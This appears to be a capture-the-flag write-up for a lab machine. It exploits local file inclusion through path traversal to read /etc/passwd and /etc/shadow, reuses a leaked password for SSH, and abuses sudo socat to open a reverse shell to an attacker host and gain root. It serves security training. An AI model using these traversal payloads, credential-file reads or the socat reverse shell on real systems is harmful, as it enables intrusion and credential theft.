What are we doing?
LFI stands for "Local File Inclusion", which is when an application is made to inappropriately access a file on the system. A lot of times this can occur when users are in control of some or all of a path the application uses. For this challenge, clicking on links on the example blog show that the user is in control of a variable called name. If we just try making the value of name any path we want (making a guess that the content of the blog is pulled in from certain "approved" local files) then perhaps we can get some information to work with.
http://**.**.***.**/article?name=../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12👨/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
falconfeast:x:1000:1000:falconfeast,,,:/home/falconfeast:/bin/bash #falconfeast:rootpassword
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mysql:x:111:116:MySQL Server,,,:/nonexistent:/bin/false
http://**.**.***.**/article?name=../../../../../etc/shadow
daemon:*:17647:0:99999:7:::
bin:*:17647:0:99999:7:::
sys:*:17647:0:99999:7:::
sync:*:17647:0:99999:7:::
games:*:17647:0:99999:7:::
man:*:17647:0:99999:7:::
lp:*:17647:0:99999:7:::
mail:*:17647:0:99999:7:::
news:*:17647:0:99999:7:::
uucp:*:17647:0:99999:7:::
proxy:*:17647:0:99999:7:::
www-data:*:17647:0:99999:7:::
backup:*:17647:0:99999:7:::
list:*:17647:0:99999:7:::
irc:*:17647:0:99999:7:::
gnats:*:17647:0:99999:7:::
nobody:*:17647:0:99999:7:::
systemd-network:*:17647:0:99999:7:::
systemd-resolve:*:17647:0:99999:7:::
syslog:*:17647:0:99999:7:::
messagebus:*:17647:0:99999:7:::
_apt:*:17647:0:99999:7:::
lxd:*:18281:0:99999:7:::
uuidd:*:18281:0:99999:7:::
dnsmasq:*:18281:0:99999:7:::
landscape:*:18281:0:99999:7:::
pollinate:*:18281:0:99999:7:::
falconfeast:$6$dYJsdbeD$rlYGlx24kUUcSHTc0dMutxEesIAUA3d8nQeTt6FblVffELe3FxLE3gOID5nLxpHoycQ9mfSC.TNxLxet9BN5c/:18281:0:99999:7:::
sshd:*:18281:0:99999:7:::
mysql:!:18281:0:99999:7:::
If nothing else, we got some user names. So while we set John the Ripper to work on that shadow file, let's take a stab in the dark:
http://**.**.*.***/article?name=../../../../home/falconfeast/user.txt
********************
It looks like the intuition based in how CTFs like this one are constructed us gets an easy flag for the user. But I can't help but think there is a less lucky way to get the flag. We certainly have performed local file inclusion by exploiting the fact there is no sanitization on the input URL or protections against accessing pretty much anywhere we want to (at least wherever the UID of the web server is allowed), so maybe that's all there is to it.
But wait
Ah, well... there is another way and it's staring us in the face in the passwd file. The comment after the account named falconfeast show what might be the plaintext password. Why someone would put a comment in the there spelling out the password is hard to imagine, but nonetheless we have it and we know because now we can ssh into the box:
falconfeast@inclusion:~$ id
uid=1000(falconfeast) gid=1000(falconfeast) groups=1000(falconfeast),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare)
I guess we can kill that John the Ripper job 😀
What can this user do?
falconfeast@inclusion:~$ sudo -l
Matching Defaults entries for falconfeast on inclusion:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User falconfeast may run the following commands on inclusion:
(root) NOPASSWD: /usr/bin/socat
This user can run socat as root, so we can set up a reverse shell and it should then allow us access to the root user's files.
RHOST=**.*.**.***
RPORT=12345
socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane
kali@kali:~$ socat file:`tty`,raw,echo=0 tcp-listen:12345
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(falconfeast) gid=1000(falconfeast) groups=1000(falconfeast),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare)
$
kali@kali:~$ socat file:`tty`,raw,echo=0 tcp-listen:12345
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls -la
total 48
drwx------ 5 root root 4096 Jan 22 2020 .
drwxr-xr-x 23 root root 4096 Jan 20 2020 ..
-rw------- 1 root root 5555 Jan 23 2020 .bash_history
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwx------ 3 root root 4096 Jan 21 2020 .cache
drwx------ 3 root root 4096 Jan 20 2020 .gnupg
-rw------- 1 root root 28 Jan 20 2020 .lesshst
drwxr-xr-x 3 root root 4096 Jan 20 2020 .local
-rw------- 1 root root 158 Jan 21 2020 .mysql_history
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw------- 1 root root 0 Jan 21 2020 .python_history
-rw-r--r-- 1 root root 21 Jan 22 2020 root.txt
# cat root.txt
********************
#